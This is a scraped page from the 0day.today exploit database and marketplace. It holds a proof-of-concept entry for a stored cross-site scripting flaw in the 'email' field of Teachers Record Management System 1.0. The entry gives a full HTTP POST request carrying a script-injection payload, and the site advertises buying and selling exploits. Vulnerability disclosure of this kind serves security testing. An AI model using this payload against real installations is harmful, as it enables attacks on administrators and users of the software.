[ 首页 ]  [ 私有 ]  [ 0Day ]  [ discount ]  [ 获取金币 ]  [ 平台 ]  [ 渗透测试 ]  [ 搜索 ]  [ 常见问题 ]  [ 联系我们 ]  [ 页面风格 ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB 官方脸书
0day.today Exploit DB 官方推特
0day.today Exploit DB 官方 RSS 频道
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - 世界最大的漏洞利用数据库。
选择语言:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
0day.today 用户须知:
  • 我们唯一的域名:http://0day.today
  • 我们大多数的材料都完全免费
  • 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
    你需要购买或者赢取金币 金币
We accept currencies: [contact admin to find more]
           
我们不希望本站被用于黑客用途。一经查实用户有任何形式的非法访问行为,此用户的账户和数据会被从本站删除。

本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
我已经是 0day.today 注册用户。 不要再显示此信息。
进站须知
  1. 请读 [ 协议 ]
  2. 请读 [ 提交 ] 规则
  3. 请访问 [ 常见问题 ] 页
  4. [ 注册 ] 用户信息
  5. 获取 [ 金币 ]
  6. 如果你想要 [ 出售 ]
  7. 如果你想要 [ 购买 ]
  8. 如果你丢失了 [ 账户 ]
  9. 如有任何问题 [ [email protected] ]


主链接


你可以由此方式联系我们

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ 授权 ] [ 注册 ] [ 恢复账号 ]
联系我们
你可以由此方式联系我们:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today 漏洞利用市场和0day漏洞利用数据库

Teachers Record Management System 1.0 - (email) Stored Cross-site Scripting Vulnerability

作者
nhattruong
风险
[
安全风险级别 - 中
]
0day-ID
0day-ID-36429
类别
web applications
添加日期
16-06-2021
平台
php
# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/admin/index.php
2. Do login
3. Execute the payload
4. Reload page to see the different

Payload:

POST /admin/adminprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/adminprofile.php
Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
Upgrade-Insecure-Requests: 1

adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=

#  0day.today [2024-07-01]  #
漏洞数据库购买和出售各类漏洞利用(例如本地,远程,拒绝服务,概念验证代码,等等)
请提交至: mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team